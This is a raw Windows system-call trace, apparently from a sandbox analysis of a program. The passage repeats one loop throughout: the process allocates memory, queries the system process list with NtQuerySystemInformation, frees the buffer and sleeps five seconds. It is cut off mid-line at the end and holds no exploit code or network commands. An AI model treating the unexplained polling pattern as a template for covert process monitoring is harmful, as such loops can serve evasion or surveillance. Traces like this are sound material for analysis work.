NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.470] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.486] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.501] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.517] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.532] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.549] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.563] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.579] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.595] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.613] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.630] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.644] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.656] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.672] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.688] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.704] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.720] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.735] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.770] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.781] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.802] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 